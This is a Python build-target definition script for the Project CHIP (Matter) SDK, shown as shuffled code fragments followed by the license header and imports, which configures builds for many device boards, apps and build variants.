"builder.AppendVariant(name=\"clang\", use_clang=True), builder.AppendVariant(name=\"test\", extra_tests=True), builder.WhitelistVariantNameForGlob('no-interactive-ipv6only') builder.WhitelistVariantNameForGlob('ipv6only') for target in app_targets:", "app=K32WApp.LIGHT, tokenizer=True, disable_ota=True, release=True) yield target.Extend('shell-release', app=K32WApp.SHELL, release=True) yield target.Extend('lock-release',", "v for v in self.variants if v.validator.Accept(target.name)] # Build every", "yield target.Extend('shell-release', app=K32WApp.SHELL, release=True) yield target.Extend('lock-release', app=K32WApp.LOCK, release=True) yield target.Extend('lock-low-power-release',", "builds is exponential here builder.AppendVariant(name=\"rpc\", validator=AcceptNameWithSubstrings( ['-light', '-lock']), enable_rpcs=True) builder.AppendVariant(name=\"with-ota-requestor\",", "skip variants that do not work for this target ok_variants", "app=Cyw30739App.LOCK) yield Target('cyw30739-cyw930739m2evb_01-ota-requestor', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR).GlobBlacklist( \"Running out of XIP", "app=cc13x2x7_26x2x7App.ALL_CLUSTERS) yield target.Extend('shell', app=cc13x2x7_26x2x7App.SHELL) def Cyw30739Targets(): yield Target('cyw30739-cyw930739m2evb_01-light', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01,", "'linux') and (HostBoard.NATIVE.BoardName() != HostBoard.ARM64.BoardName()) if cross_compile: targets.append(target.Extend('arm64', board=HostBoard.ARM64)) app_targets", "'only user requested'), efr_target.Extend('brd4186a', board=Efr32Board.BRD4186A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4187a', board=Efr32Board.BRD4187A).GlobBlacklist(", "target.Extend('light', board=Bl602Board.BL602BOARD, app=Bl602App.LIGHT) def IMXTargets(): target = Target('imx', IMXBuilder) yield", "app=HostApp.MIN_MDNS)) app_targets.append(target.Extend('light', app=HostApp.LIGHT)) app_targets.append(target.Extend('lock', app=HostApp.LOCK)) app_targets.append(target.Extend('shell', app=HostApp.SHELL)) app_targets.append(target.Extend( 'ota-provider', app=HostApp.OTA_PROVIDER,", "conflicts=['tsan'], use_asan=True), builder.AppendVariant(name=\"libfuzzer\", requires=[ 
\"clang\"], use_libfuzzer=True), builder.AppendVariant(name=\"clang\", use_clang=True), builder.AppendVariant(name=\"test\", extra_tests=True),", "Cyw30739Targets(): yield Target('cyw30739-cyw930739m2evb_01-light', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LIGHT) yield Target('cyw30739-cyw930739m2evb_01-lock', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01,", "from builders.nrf import NrfApp, NrfBoard, NrfConnectBuilder from builders.qpg import QpgApp,", "@property def IsGlobBlacklisted(self): return self.glob_blacklist_reason is not None @property def", "from builders.esp32 import Esp32App, Esp32Board, Esp32Builder from builders.host import HostApp,", "app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True) yield esp32_target.Extend('m5stack-all-clusters-rpc-ipv6only', board=Esp32Board.M5Stack,", "def __init__(self, name: str, validator=AcceptAnyName(), conflicts: List[str] = [], requires:", "app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True).GlobBlacklist(\"Reduce default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True, enable_ipv4=False).GlobBlacklist(\"Reduce", "builder.AppendVariant(name=\"asan\", use_asan=True) target = Target('tizen-arm', TizenBuilder, board=TizenBoard.ARM) builder.targets.append(target.Extend('light', app=TizenApp.LIGHT)) for", "app=HostApp.SHELL)) app_targets.append(target.Extend( 'ota-provider', app=HostApp.OTA_PROVIDER, enable_ble=False)) app_targets.append(target.Extend( 'ota-requestor', app=HostApp.OTA_REQUESTOR, enable_ble=False)) app_targets.append(target.Extend('python-bindings',", "TelinkBoard, TelinkBuilder from builders.tizen import TizenApp, TizenBoard, TizenBuilder from builders.bl602", "class AcceptNameWithSubstrings: def __init__(self, substr: List[str]): self.substr = substr def", "= [ target.Extend('nrf5340dk', board=NrfBoard.NRF5340DK), target.Extend('nrf52840dk', board=NrfBoard.NRF52840DK), ] # Enable nrf52840dongle", "Interactive builds will not compile by default on arm cross", "None @property def GlobBlacklistReason(self): return self.glob_blacklist_reason class AcceptAnyName: def Accept(self,", "v in self.variants if v.validator.Accept(target.name)] # Build every possible variant", "target.Extend('light-release-no-ota', app=K32WApp.LIGHT, tokenizer=True, disable_ota=True, release=True) yield target.Extend('shell-release', app=K32WApp.SHELL, release=True) yield", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "added one by one ALL.append(Target('telink-tlsr9518adk80d-light', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.LIGHT)) ALL.append(Target('telink-tlsr9518adk80d-light-switch', TelinkBuilder,", "self builder.identifier = self.name builder.output_dir = os.path.join(output_prefix, self.name) builder.enable_flashbundle(enable_flashbundle) return", "for option in subgroup: variant_target = variant_target.Extend( option.name, **option.buildargs) #", "target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x64-chip-tool', board=AndroidBoard.X64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x86-chip-tool', board=AndroidBoard.X86,", "board=Efr32Board.BRD4187A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4304a', board=Efr32Board.BRD4304A).GlobBlacklist( 'only user requested') ]", "substr def 
Accept(self, name: str): for s in self.substr: if", "for target in self.targets: yield target # skip variants that", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "= Target('efr32', Efr32Builder) board_targets = [ efr_target.Extend('brd4161a', board=Efr32Board.BRD4161A), efr_target.Extend('brd4163a', board=Efr32Board.BRD4163A).GlobBlacklist(", "False def AllRequirementsMet(items: List[BuildVariant]) -> bool: \"\"\" Check that item.requires", "targets. \"\"\" for target in self.targets: yield target # skip", "variant_target = variant_target.GlobBlacklist( 'Reduce default build variants') yield variant_target def", "board=Efr32Board.BRD4163A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4164a', board=Efr32Board.BRD4164A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4166a',", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "board_target in board_targets: builder.targets.append(board_target.Extend( 'window-covering', app=Efr32App.WINDOW_COVERING)) builder.targets.append(board_target.Extend( 'switch', app=Efr32App.SWITCH)) builder.targets.append(board_target.Extend(", "board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LIGHT) yield Target('cyw30739-cyw930739m2evb_01-lock', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LOCK) yield Target('cyw30739-cyw930739m2evb_01-ota-requestor', Cyw30739Builder,", "specified build) \"\"\" def __init__(self, name, builder_class, **kwargs): self.name =", "based on a starting target. \"\"\" def __init__(self, targets: List[Target]", "yield target.Extend('lock', app=NrfApp.LOCK) yield target.Extend('light', app=NrfApp.LIGHT) yield target.Extend('shell', app=NrfApp.SHELL) yield", "app_targets: yield target.Extend('release', profile=MbedProfile.RELEASE) yield target.Extend('develop', profile=MbedProfile.DEVELOP).GlobBlacklist( 'Compile only for", "esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU, app=Esp32App.TESTS) def Efr32Targets(): efr_target = Target('efr32', Efr32Builder) board_targets", "board=Esp32Board.DevKitC) yield devkitc.Extend('all-clusters', app=Esp32App.ALL_CLUSTERS) yield devkitc.Extend('all-clusters-ipv6only', app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield devkitc.Extend('shell',", "\"\"\" def __init__(self, targets: List[Target] = []): # note the", "a starting target. \"\"\" def __init__(self, targets: List[Target] = []):", "yield target.Extend('all-clusters', app=cc13x2x7_26x2x7App.ALL_CLUSTERS) yield target.Extend('shell', app=cc13x2x7_26x2x7App.SHELL) def Cyw30739Targets(): yield Target('cyw30739-cyw930739m2evb_01-light',", "use_asan=True) target = Target('tizen-arm', TizenBuilder, board=TizenBoard.ARM) builder.targets.append(target.Extend('light', app=TizenApp.LIGHT)) for target", "builder.AppendVariant(name=\"no-ble\", enable_ble=False), builder.AppendVariant(name=\"no-wifi\", enable_wifi=False), builder.AppendVariant(name=\"tsan\", conflicts=['asan'], use_tsan=True), builder.AppendVariant(name=\"asan\", conflicts=['tsan'], use_asan=True),", "'only user requested'), efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4186a', board=Efr32Board.BRD4186A).GlobBlacklist(", "number of potential builds is exponential here. 
builder = VariantBuilder()", "'-nrf5340dk-' in rpc.name: rpc = rpc.GlobBlacklist( 'Compile failure due to", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "build variant \"\"\" clone = self.Clone() clone.name += \"-\" +", "= requires def HasConflicts(items: List[BuildVariant]) -> bool: for a, b", "use_platform_mdns=True).GlobBlacklist(\"Reduce default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True, enable_ipv4=False).GlobBlacklist(\"Reduce default", "board=QpgBoard.QPG6105, app=QpgApp.LOCK) yield target.Extend('light', board=QpgBoard.QPG6105, app=QpgApp.LIGHT) yield target.Extend('shell', board=QpgBoard.QPG6105, app=QpgApp.SHELL)", "(HostBoard.NATIVE.PlatformName() == 'linux') and (HostBoard.NATIVE.BoardName() != HostBoard.ARM64.BoardName()) if cross_compile: targets.append(target.Extend('arm64',", "for target in builder.AllVariants(): yield target def Bl602Targets(): target =", "Cyw30739App, Cyw30739Board, Cyw30739Builder from builders.efr32 import Efr32App, Efr32Board, Efr32Builder from", "'ota-requestor', app=HostApp.OTA_REQUESTOR, enable_ble=False)) app_targets.append(target.Extend('python-bindings', app=HostApp.PYTHON_BINDINGS)) builder = VariantBuilder() # Possible", "builder.targets.append(board_target.Extend('lock', app=Efr32App.LOCK)) # Possible build variants. Note that number of", "Bl602Targets(), IMXTargets(), ] for generator in target_generators: for target in", "or ('-python-bindings' in target.name) or ('nl-test-runner' in target.name): # Single-variant", "specific language governing permissions and # limitations under the License.", "in self.variants if v.validator.Accept(target.name)] # Build every possible variant for", "b in combinations(items, 2): if (a.name in b.conflicts) or (b.name", "default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True, enable_ipv4=False).GlobBlacklist(\"Reduce default build", "suffix clone.create_kw_args.update(kargs) return clone def Create(self, runner, repository_path: str, output_prefix:", "+= reason else: clone.glob_blacklist_reason = reason return clone @property def", "for a, b in combinations(items, 2): if (a.name in b.conflicts)", "another variant to accepted variants. 
Arguments are construction variants to", "cross_compile = (HostBoard.NATIVE.PlatformName() == 'linux') and (HostBoard.NATIVE.BoardName() != HostBoard.ARM64.BoardName()) if", "test_target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder) for board in [HostBoard.NATIVE, HostBoard.FAKE]: yield", "validator=AcceptAnyName(), conflicts: List[str] = [], requires: List[str] = [], **buildargs):", "self.\"\"\" clone = Target(self.name, self.builder_class, **self.create_kw_args.copy()) clone.glob_blacklist_reason = self.glob_blacklist_reason return", "in combinations(items, 2): if (a.name in b.conflicts) or (b.name in", "separator to the clone name **kargs: arguments needed to produce", "# you may not use this file except in compliance", "Yields a list of acceptable variants for the given targets.", "self.glob_blacklist_reason class AcceptAnyName: def Accept(self, name: str): return True class", "yield ameba_target.Extend('amebad-light', board=AmebaBoard.AMEBAD, app=AmebaApp.LIGHT) yield ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED) def K32WTargets():", "(HostBoard.NATIVE.BoardName() != HostBoard.ARM64.BoardName()) if cross_compile: targets.append(target.Extend('arm64', board=HostBoard.ARM64)) app_targets = []", "\"\"\" for target in self.targets: yield target # skip variants", "'only user requested'), efr_target.Extend('brd4304a', board=Efr32Board.BRD4304A).GlobBlacklist( 'only user requested') ] builder", "NrfApp, NrfBoard, NrfConnectBuilder from builders.qpg import QpgApp, QpgBoard, QpgBuilder from", "[ v for v in self.variants if v.validator.Accept(target.name)] # Build", "app=IMXApp.LIGHT) yield target.Extend('thermostat', app=IMXApp.THERMOSTAT) yield target.Extend('all-clusters-app', app=IMXApp.ALL_CLUSTERS) yield target.Extend('ota-provider-app', app=IMXApp.OTA_PROVIDER)", "target: Has a name identifier plus parameters on how to", "class AcceptAnyName: def Accept(self, name: str): return True class AcceptNameWithSubstrings:", "runner=runner, **self.create_kw_args) builder.target = self builder.identifier = self.name builder.output_dir =", "clone def Create(self, runner, repository_path: str, output_prefix: str, enable_flashbundle: bool):", "yield target.Extend('lock', board=QpgBoard.QPG6105, app=QpgApp.LOCK) yield target.Extend('light', board=QpgBoard.QPG6105, app=QpgApp.LIGHT) yield target.Extend('shell',", "devkitc.Extend('light', app=Esp32App.LIGHT) yield devkitc.Extend('lock', app=Esp32App.LOCK) yield devkitc.Extend('bridge', app=Esp32App.BRIDGE) yield devkitc.Extend('temperature-measurement',", "app=Esp32App.ALL_CLUSTERS) yield esp32_target.Extend('m5stack-all-clusters-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS,", "[] def WhitelistVariantNameForGlob(self, name): \"\"\" Whitelist the specified variant to", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "Handles conflict resolution between build variants and globbing whitelist targets.", "' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') def InfineonTargets(): target = Target('infineon', InfineonBuilder) yield target.Extend('p6-lock',", "b.conflicts) or (b.name in a.conflicts): return True return False def", "Esp32Builder) yield esp32_target.Extend('m5stack-all-clusters', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS) yield esp32_target.Extend('m5stack-all-clusters-ipv6only', 
board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_ipv4=False)", "app=Efr32App.WINDOW_COVERING)) builder.targets.append(board_target.Extend( 'switch', app=Efr32App.SWITCH)) builder.targets.append(board_target.Extend( 'unit-test', app=Efr32App.UNIT_TEST)) builder.targets.append( board_target.Extend('light', app=Efr32App.LIGHT))", "target.Extend('chip-tool-release', app=IMXApp.CHIP_TOOL, release=True) yield target.Extend('lighting-app-release', app=IMXApp.LIGHT, release=True) yield target.Extend('thermostat-release', app=IMXApp.THERMOSTAT,", "under the Apache License, Version 2.0 (the \"License\"); # you", "here. builder = VariantBuilder() builder.AppendVariant(name=\"no-ble\", enable_ble=False) builder.AppendVariant(name=\"no-wifi\", enable_wifi=False) builder.AppendVariant(name=\"asan\", use_asan=True)", "Only a few are whitelisted for globs name = '-'.join([o.name", "board=InfineonBoard.P6BOARD, app=InfineonApp.ALL_CLUSTERS) yield target.Extend('p6-light', board=InfineonBoard.P6BOARD, app=InfineonApp.LIGHT) def AmebaTargets(): ameba_target =", "disable_ota=True, release=True) yield target.Extend('shell-release', app=K32WApp.SHELL, release=True) yield target.Extend('lock-release', app=K32WApp.LOCK, release=True)", "app=AmebaApp.ALL_CLUSTERS) yield ameba_target.Extend('amebad-light', board=AmebaBoard.AMEBAD, app=AmebaApp.LIGHT) yield ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED) def", "app=AndroidApp.CHIP_TVServer) yield target.Extend('x86-chip-tvserver', board=AndroidBoard.X86, app=AndroidApp.CHIP_TVServer) yield target.Extend('x64-chip-tvserver', board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer) yield", "# Target ready to be created - no conflicts variant_target", "builder.AppendVariant(name=\"no-wifi\", enable_wifi=False), builder.AppendVariant(name=\"tsan\", conflicts=['asan'], use_tsan=True), builder.AppendVariant(name=\"asan\", conflicts=['tsan'], use_asan=True), builder.AppendVariant(name=\"libfuzzer\", requires=[", "cc13x2x7_26x2x7App, cc13x2x7_26x2x7Builder from builders.cyw30739 import Cyw30739App, Cyw30739Board, Cyw30739Builder from builders.efr32", "builds yield target else: builder.targets.append(target) for target in builder.AllVariants(): if", "ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED) def K32WTargets(): target = Target('k32w', K32WBuilder) yield", "app=Esp32App.SHELL) yield devkitc.Extend('light', app=Esp32App.LIGHT) yield devkitc.Extend('lock', app=Esp32App.LOCK) yield devkitc.Extend('bridge', app=Esp32App.BRIDGE)", "accepted variants. Arguments are construction variants to BuildVariant. Example usage:", "builder = VariantBuilder() # Possible build variants. 
Note that number", "yield target.Extend('nrf52840dongle-light', board=NrfBoard.NRF52840DONGLE, app=NrfApp.LIGHT) for target in targets: yield target.Extend('all-clusters',", "esp32_target.Extend('c3devkit-all-clusters', board=Esp32Board.C3DevKit, app=Esp32App.ALL_CLUSTERS) devkitc = esp32_target.Extend('devkitc', board=Esp32Board.DevKitC) yield devkitc.Extend('all-clusters', app=Esp32App.ALL_CLUSTERS)", "app=IMXApp.CHIP_TOOL) yield target.Extend('lighting-app', app=IMXApp.LIGHT) yield target.Extend('thermostat', app=IMXApp.THERMOSTAT) yield target.Extend('all-clusters-app', app=IMXApp.ALL_CLUSTERS)", "devkitc.Extend('bridge', app=Esp32App.BRIDGE) yield devkitc.Extend('temperature-measurement', app=Esp32App.TEMPERATURE_MEASUREMENT) yield devkitc.Extend('temperature-measurement-rpc', app=Esp32App.TEMPERATURE_MEASUREMENT, enable_rpcs=True) yield", "yield target.Extend('x64-chip-tvserver', board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm64-chip-tv-casting-app', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TV_CASTING_APP) yield target.Extend('arm-chip-tv-casting-app',", "efr_target.Extend('brd4163a', board=Efr32Board.BRD4163A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4164a', board=Efr32Board.BRD4164A).GlobBlacklist( 'only user requested'),", "board=Efr32Board.BRD4186A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4187a', board=Efr32Board.BRD4187A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4304a',", "enable_ipv4=False) yield esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True) yield esp32_target.Extend('m5stack-all-clusters-rpc-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS,", "devkitc = esp32_target.Extend('devkitc', board=Esp32Board.DevKitC) yield devkitc.Extend('all-clusters', app=Esp32App.ALL_CLUSTERS) yield devkitc.Extend('all-clusters-ipv6only', app=Esp32App.ALL_CLUSTERS,", "\"\"\"Creates a clone of self.\"\"\" clone = Target(self.name, self.builder_class, **self.create_kw_args.copy())", "app_targets.append(target.Extend('python-bindings', app=HostApp.PYTHON_BINDINGS)) builder = VariantBuilder() # Possible build variants. Note", "target.name) or ('nl-test-runner' in target.name): # Single-variant builds yield target", "from builders.imx import IMXApp, IMXBuilder class Target: \"\"\"Represents a build", "len(ok_variants) + 1): for subgroup in combinations(ok_variants, variant_count): if HasConflicts(subgroup):", "= [] def WhitelistVariantNameForGlob(self, name): \"\"\" Whitelist the specified variant", "we do not want a 'build all' to select all", "app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-arm64-chip-tool', board=AndroidBoard.AndroidStudio_ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x86-chip-tool', board=AndroidBoard.AndroidStudio_X86, app=AndroidApp.CHIP_TOOL) yield", "if v.validator.Accept(target.name)] # Build every possible variant for variant_count in", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "identifier plus parameters on how to build it (what builder", "multiple build variants based on a starting target. 
\"\"\" def", "in target.name and '-no-interactive' not in target.name: # Interactive builds", "app=Esp32App.BRIDGE) yield devkitc.Extend('temperature-measurement', app=Esp32App.TEMPERATURE_MEASUREMENT) yield devkitc.Extend('temperature-measurement-rpc', app=Esp32App.TEMPERATURE_MEASUREMENT, enable_rpcs=True) yield esp32_target.Extend('qemu-tests',", "app=NrfApp.LIGHT) for target in targets: yield target.Extend('all-clusters', app=NrfApp.ALL_CLUSTERS) yield target.Extend('lock',", "yield target.Extend('shell', board=QpgBoard.QPG6105, app=QpgApp.SHELL) yield target.Extend('persistent-storage', board=QpgBoard.QPG6105, app=QpgApp.PERSISTENT_STORAGE) def TizenTargets():", "yield devkitc.Extend('light', app=Esp32App.LIGHT) yield devkitc.Extend('lock', app=Esp32App.LOCK) yield devkitc.Extend('bridge', app=Esp32App.BRIDGE) yield", "NrfTargets(), AndroidTargets(), MbedTargets(), InfineonTargets(), AmebaTargets(), K32WTargets(), cc13x2x7_26x2x7Targets(), Cyw30739Targets(), QorvoTargets(), TizenTargets(),", "else: builder.targets.append(target) for target in builder.AllVariants(): if cross_compile and 'chip-tool'", "a 'build all' to select all variants, so variants are", "a build target: Has a name identifier plus parameters on", "yield devkitc.Extend('bridge', app=Esp32App.BRIDGE) yield devkitc.Extend('temperature-measurement', app=Esp32App.TEMPERATURE_MEASUREMENT) yield devkitc.Extend('temperature-measurement-rpc', app=Esp32App.TEMPERATURE_MEASUREMENT, enable_rpcs=True)", "variants, so variants are generally glob-blacklisted. \"\"\" self.glob_whitelist.append(name) def AppendVariant(self,", "board=AndroidBoard.AndroidStudio_ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x86-chip-tool', board=AndroidBoard.AndroidStudio_X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x64-chip-tool', board=AndroidBoard.AndroidStudio_X64, app=AndroidApp.CHIP_TOOL)", "QpgApp, QpgBoard, QpgBuilder from builders.telink import TelinkApp, TelinkBoard, TelinkBuilder from", "builder.AppendVariant(name=\"rpc\", validator=AcceptNameWithSubstrings( ['-light', '-lock']), enable_rpcs=True) builder.AppendVariant(name=\"with-ota-requestor\", enable_ota_requestor=True) builder.WhitelistVariantNameForGlob('rpc') for target", "in item.requires: if requirement not in available: return False return", "def HostTargets(): target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder) target_native = target.Extend(HostBoard.NATIVE.BoardName(), board=HostBoard.NATIVE)", "AppendVariant(self, **args): \"\"\" Add another variant to accepted variants. 
Arguments", "not compile by default on arm cross compiles # because", "builder.AppendVariant(name=\"libfuzzer\", requires=[ \"clang\"], use_libfuzzer=True), builder.AppendVariant(name=\"clang\", use_clang=True), builder.AppendVariant(name=\"test\", extra_tests=True), builder.WhitelistVariantNameForGlob('no-interactive-ipv6only') builder.WhitelistVariantNameForGlob('ipv6only')", "self.targets = targets[:] self.variants = [] self.glob_whitelist = [] def", "[] for target in targets: app_targets.append(target.Extend('lock', app=MbedApp.LOCK)) app_targets.append(target.Extend('light', app=MbedApp.LIGHT)) app_targets.append(target.Extend(", "reason else: clone.glob_blacklist_reason = reason return clone @property def IsGlobBlacklisted(self):", "yield Target('cyw30739-cyw930739m2evb_01-lock', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LOCK) yield Target('cyw30739-cyw930739m2evb_01-ota-requestor', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR).GlobBlacklist(", "interactive_mode=False), builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False), builder.AppendVariant(name=\"no-ble\", enable_ble=False), builder.AppendVariant(name=\"no-wifi\", enable_wifi=False), builder.AppendVariant(name=\"tsan\", conflicts=['asan'], use_tsan=True),", "'unit-test', app=Efr32App.UNIT_TEST)) builder.targets.append( board_target.Extend('light', app=Efr32App.LIGHT)) builder.targets.append(board_target.Extend('lock', app=Efr32App.LOCK)) # Possible build", "[ target.Extend('CY8CPROTO_062_4343W', board=MbedBoard.CY8CPROTO_062_4343W), ] app_targets = [] for target in", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "GlobBlacklistReason(self): return self.glob_blacklist_reason class AcceptAnyName: def Accept(self, name: str): return", "efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4186a', board=Efr32Board.BRD4186A).GlobBlacklist( 'only user requested'),", "progress_logging=False) def QorvoTargets(): target = Target('qpg', QpgBuilder) yield target.Extend('lock', board=QpgBoard.QPG6105,", "target.Extend('chip-tool', app=IMXApp.CHIP_TOOL) yield target.Extend('lighting-app', app=IMXApp.LIGHT) yield target.Extend('thermostat', app=IMXApp.THERMOSTAT) yield target.Extend('all-clusters-app',", "self.Clone() if clone.glob_blacklist_reason: clone.glob_blacklist_reason += \", \" clone.glob_blacklist_reason += reason", "part of the default sysroot yield target.GlobBlacklist('Arm crosscompile does not", "that number of potential # builds is exponential here builder.AppendVariant(name=\"same-event-loop\",", "def Accept(self, name: str): for s in self.substr: if s", "Apache License, Version 2.0 (the \"License\"); # you may not", "build variants yield target_native.Extend('chip-cert', app=HostApp.CERT_TOOL) yield target_native.Extend('address-resolve-tool', app=HostApp.ADDRESS_RESOLVE) yield target_native.Extend('address-resolve-tool-clang',", "either express or implied. 
# See the License for the", "enable_ota_requestor=True) builder.WhitelistVariantNameForGlob('rpc') for target in builder.AllVariants(): yield target def NrfTargets():", "target.Extend('develop', profile=MbedProfile.DEVELOP).GlobBlacklist( 'Compile only for debugging purpose - ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html')", "target = Target('infineon', InfineonBuilder) yield target.Extend('p6-lock', board=InfineonBoard.P6BOARD, app=InfineonApp.LOCK) yield target.Extend('p6-all-clusters',", "\"\"\"Creates a clone of the current object extending its build", "board=QpgBoard.QPG6105, app=QpgApp.LIGHT) yield target.Extend('shell', board=QpgBoard.QPG6105, app=QpgApp.SHELL) yield target.Extend('persistent-storage', board=QpgBoard.QPG6105, app=QpgApp.PERSISTENT_STORAGE)", "yield devkitc.Extend('shell', app=Esp32App.SHELL) yield devkitc.Extend('light', app=Esp32App.LIGHT) yield devkitc.Extend('lock', app=Esp32App.LOCK) yield", "Efr32App, Efr32Board, Efr32Builder from builders.esp32 import Esp32App, Esp32Board, Esp32Builder from", "List[BuildVariant]) -> bool: \"\"\" Check that item.requires is satisfied for", "import TizenApp, TizenBoard, TizenBuilder from builders.bl602 import Bl602App, Bl602Board, Bl602Builder", "in target.name: # Interactive builds will not compile by default", "Esp32Board, Esp32Builder from builders.host import HostApp, HostBoard, HostBuilder from builders.infineon", "HasConflicts(subgroup): continue if not AllRequirementsMet(subgroup): continue # Target ready to", "K32WBuilder from builders.mbed import MbedApp, MbedBoard, MbedBuilder, MbedProfile from builders.nrf", "from builders.k32w import K32WApp, K32WBuilder from builders.mbed import MbedApp, MbedBoard,", "builder.AppendVariant(name=\"with-ota-requestor\", enable_ota_requestor=True) builder.WhitelistVariantNameForGlob('rpc') for target in builder.AllVariants(): yield target def", "def InfineonTargets(): target = Target('infineon', InfineonBuilder) yield target.Extend('p6-lock', board=InfineonBoard.P6BOARD, app=InfineonApp.LOCK)", "= targets[:] self.variants = [] self.glob_whitelist = [] def WhitelistVariantNameForGlob(self,", "board=Bl602Board.BL602BOARD, app=Bl602App.LIGHT) def IMXTargets(): target = Target('imx', IMXBuilder) yield target.Extend('chip-tool',", "= [] target_generators = [ HostTargets(), Esp32Targets(), Efr32Targets(), NrfTargets(), AndroidTargets(),", "arm cross compiles # because libreadline is not part of", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "self.builder_class = builder_class self.glob_blacklist_reason = None self.create_kw_args = kwargs def", "one by one ALL.append(Target('telink-tlsr9518adk80d-light', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.LIGHT)) ALL.append(Target('telink-tlsr9518adk80d-light-switch', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D,", "self.conflicts = conflicts self.buildargs = buildargs self.requires = requires def", "target # Without extra build variants yield target_native.Extend('chip-cert', app=HostApp.CERT_TOOL) yield", "target.Extend('shell', app=NrfApp.SHELL) yield target.Extend('pump', app=NrfApp.PUMP) yield target.Extend('pump-controller', app=NrfApp.PUMP_CONTROLLER) rpc =", "app=AndroidApp.CHIP_TV_CASTING_APP) def MbedTargets(): target = Target('mbed', MbedBuilder) targets = [", "TizenBuilder, board=TizenBoard.ARM) builder.targets.append(target.Extend('light', app=TizenApp.LIGHT)) for target in builder.AllVariants(): yield target", "for target in generator: ALL.append(target) # 
<filename>scripts/build/build/targets.py
# Copyright (c) 2021 Project CHIP Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import os
from itertools import combinations
from typing import List

from builders.ameba import AmebaApp, AmebaBoard, AmebaBuilder
from builders.android import AndroidApp, AndroidBoard, AndroidBuilder
from builders.cc13x2x7_26x2x7 import cc13x2x7_26x2x7App, cc13x2x7_26x2x7Builder
from builders.cyw30739 import Cyw30739App, Cyw30739Board, Cyw30739Builder
from builders.efr32 import Efr32App, Efr32Board, Efr32Builder
from builders.esp32 import Esp32App, Esp32Board, Esp32Builder
